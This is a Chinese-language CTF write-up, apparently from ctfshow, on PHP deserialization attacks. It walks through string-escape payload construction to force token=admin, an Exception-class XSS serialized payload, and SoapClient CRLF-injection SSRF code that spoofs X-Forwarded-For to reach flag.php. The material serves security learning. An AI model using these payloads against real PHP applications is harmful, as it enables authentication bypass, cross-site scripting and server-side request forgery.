web262

拿着题审计一下

<?php
error_reporting(0);
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);   //实例化对象
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    setcookie('msg',base64_encode($umsg));  //设置cookie 并且进行加密
    echo 'Your message has been sent';
}       //这里有个过滤函数，过滤了fuck，替换成loveU  判断是增的替换 就思考是不是 占位运算

highlight_file(__FILE__);


?>

发现这个源码只有类的设置和waf过滤  并没有我们要的flag

发现有个 message.php

发现你妹的这个和上边的是一点关系也没有的

if(isset($_COOKIE['msg'])){      //判断cookie是否存在msg  对cookie进行先base64解密 再反序列化 那我们就需要对payload先进行反序列化 再进行base64解密
    $msg = unserialize(base64_decode($_COOKIE['msg']));
    if($msg->token=='admin'){
        echo $flag;
    }
}

根据上边的逻辑就是 我们只要让 token=admin 就能输出flag

这个判断少个判断就是  他上面的替换没在这个判断cookie的逻辑内进行确认

所以利用这个我们只需要 把 token的值改为 admin 就能输出flag

但是这个题的实际考点就是字符串的逃逸   但是这个过滤没有应用起来  

如果过滤被应用了  那我们就需要换思路了
首先激活判断先让$f,$m,$t 进行调用 这个就可以让我们new新对象的时候进行创建赋值

构造pop  步骤依旧是先 找原来的和没有替换的

class message{
   public $from;
   public $msg;
   public $to;
   public $token='admin';
   public function __construct($f,$m,$t){
       $this->from = $f;
       $this->msg = $m;
       $this->to = $t;
   }
}
function filter($msg){
   return str_replace('fuck', 'loveU',$msg);
}
$x=new message('1','fuck','3');
$y=serialize($x);
$z=filter($y);
echo $z;

输出一下

替换后的

O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:4:"loveU";s:2:"to";s:1:"3";s:5:"token";s:5:"admin";}
44 * 5 =110

替换前的

O:7:"message":4:{s:4:"from";s:1:"1";s:3:"msg";s:4:"fuck";s:2:"to";s:1:"3";s:5:"token";s:5:"admin";}

44 * 4 + 44 正好和上边的想等
发现问题   替换后  s:4 和 loveU  是不对应的
因为fuck的输入是我们可以进行控制的所以  就找两者后边的数和替换后字符位数的最大公倍数 （这个仅仅适用于 替换多余一个字符时）（44 和 5的最大公倍数）
后边是44位  我们就需要生成 44个fuck

payload=44*'fuck'+'\";s:2:"to";s:1:"3";s:5:"token";s:5:"admin";}'

做到替换前后上下是相等的  因为判断的条件是token是否为 admin 后边的admin保留就可以输出flag 

得知思路之后 先输出44 个fuck

使用之后再加上 后边的就是payload了

$msg=new message('fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:3:"msg";s:1:"a";s:2:"to";s:1:"b";s:5:"token";s:5:"admin";}','a','b');
$msg_1=serialize($msg);
$msg_2=filter($msg_1);
echo $msg_2;
echo "\n";
echo base64_encode($msg_2);

php反序列化原生态

什么是原生态：我的理解就是 利用php模式方法原有的类进行构造恶意的payload

浅析PHP原生类-安全KER - 安全资讯平台

假设给你这个源码  让你得到flag 我们发现我们是无法获取类设定的信息的所以就只能使用php原生自带的方法 去构造恶意的payload 

但是这个有个前提就是你得先知道他是什么的魔术方法

这个就是  echo  输出 echo是输出字符串的  所以 这个就是调用了  __toString的方法

然后寻找tostring的原生态使用脚本

注意：使用脚本之前要先把 php.ini的soap协议打开

 

<?php
$classes = get_declared_classes();
foreach ($classes as $class) {
    $methods = get_class_methods($class);
    foreach ($methods as $method) {
        if (in_array($method, array(
//            '__destruct',
           '__toString',
//            '__wakeup',
            // '__call',
//            '__callStatic',
//            '__get',
//            '__set',
//            '__isset',
//            '__unset',
//            '__invoke',
//            '__set_state'
        ))) {
            print $class . '::' . $method . "\n";
        }
    }
}

运行脚本

发现获取了一堆

随便找一个 Exception::__toString

这个利用输出报错返回的话结果会更明显一些

    // public Exception::__toString(): 这个Exception就是个类
$xx = new Exception("<script>alert('xss')</script>");
$xxx=serialize($xx);
echo urlencode($xxx);

O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A29%3A%22%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A100%3A%22F%3A%5Cphp+study%5C061-Web%E6%94%BB%E9%98%B2-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%26%E5%AD%97%E7%AC%A6%E4%B8%B2%E9%80%83%E9%80%B8%26CVE%E7%BB%95%E8%BF%87%26%E5%8E%9F%E7%94%9F%E7%B1%BB%E4%BB%A3%E7%A0%81%E7%AD%89%5Cysl_xssdemo.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A20%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D

ctf show 

看这个简单的代码其实就知道是 原生态的利用了    并且这个调用的魔术方法是 __call（调用不存在的魔术方法的时候会触发）

那就去找他的原生态的类

那这个我们的首先反应是不是 xff 修改进入呢

发现不成功  就猜测这个可能是  结合的ssrf 让服务器本身去访问

SoapClient::__call

生成脚本的类

使用文章的这个ssrf进行操作一下

// //满足xff =127.0.0.1 token=ctfshow
$ua="aaa\r\nX-Forwarded-For:127.0.0.1,127.0.0.1\r\nContent-Type:application/x-www-form-urlencoded\r\nContent-Length:13\r\n\r\ntoken=ctfshow";
// 调用原生类使用
$client=new SoapClient(null,array('uri'=>'http://127.0.0.1/','location'=>'http://127.0.0.1/flag.php','user_agent'=>$ua));
// echo serialize($client);
echo urlencode(serialize($client));